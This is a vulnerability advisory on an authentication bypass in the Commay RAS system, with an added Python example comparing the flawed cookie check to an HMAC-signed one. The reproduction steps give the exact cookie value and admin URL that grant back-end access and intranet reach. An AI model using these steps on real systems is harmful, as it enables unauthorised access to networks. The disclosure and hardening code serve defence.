Commay RAS System Cookie Verification Bypass Vulnerability
Vulnerability Description
Cookie verification in the RAS system can be bypassed. When the cookie RAS_Admin_UserInfo_UserName is set to admin, the administrative back end can be accessed.
Vulnerability Impact
Commay RAS system
Network surveying and mapping
Vulnerability Reproduction
The login page is as follows
Add the following cookie:
RAS_Admin_UserInfo_UserName=admin
Visit /Server/CmxUser.php?pgid=UserList
After gaining access, you can add users and authorize login devices to access the intranet directly.
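The flaw described above comes down to trusting a value the client controls. The following added example (not the product's code, and not from the original post) models that check beside a hardened one that only accepts a cookie the server itself issued and authenticated with an HMAC. The function names, SECRET_KEY and MAX_AGE are assumptions made for illustration; only the cookie name comes from the page.

```python
import hashlib
import hmac
import time

COOKIE_NAME = "RAS_Admin_UserInfo_UserName"  # cookie name taken from the page
SECRET_KEY = b"constructed-demo-key"  # assumption: server-side secret, never sent to clients
MAX_AGE = 1800  # assumption: session lifetime in seconds


def weak_is_admin(cookies):
    """Models the described flaw: the client-supplied value is trusted as identity."""
    return cookies.get(COOKIE_NAME) == "admin"


def _mac(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(username, now=None):
    """Called only after a successful password check; binds user and issue time."""
    if "|" in username:
        raise ValueError("separator not allowed in username")
    issued = int(time.time() if now is None else now)
    payload = f"{username}|{issued}"
    return f"{payload}|{_mac(payload)}"


def verified_user(cookies, now=None):
    """Return the username only if the cookie has a valid, unexpired MAC."""
    parts = cookies.get(COOKIE_NAME, "").split("|")
    if len(parts) != 3:
        return None  # bare values such as "admin" carry no MAC at all
    username, issued, tag = parts
    expected = _mac(f"{username}|{issued}")
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    age = (time.time() if now is None else now) - int(issued)
    if age < 0 or age > MAX_AGE:
        return None
    return username
```

A server-side session store keyed by a random identifier achieves the same goal; in either design the user name in the cookie is never the proof of identity.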
This post is licensed under CC BY 4.0 by the author.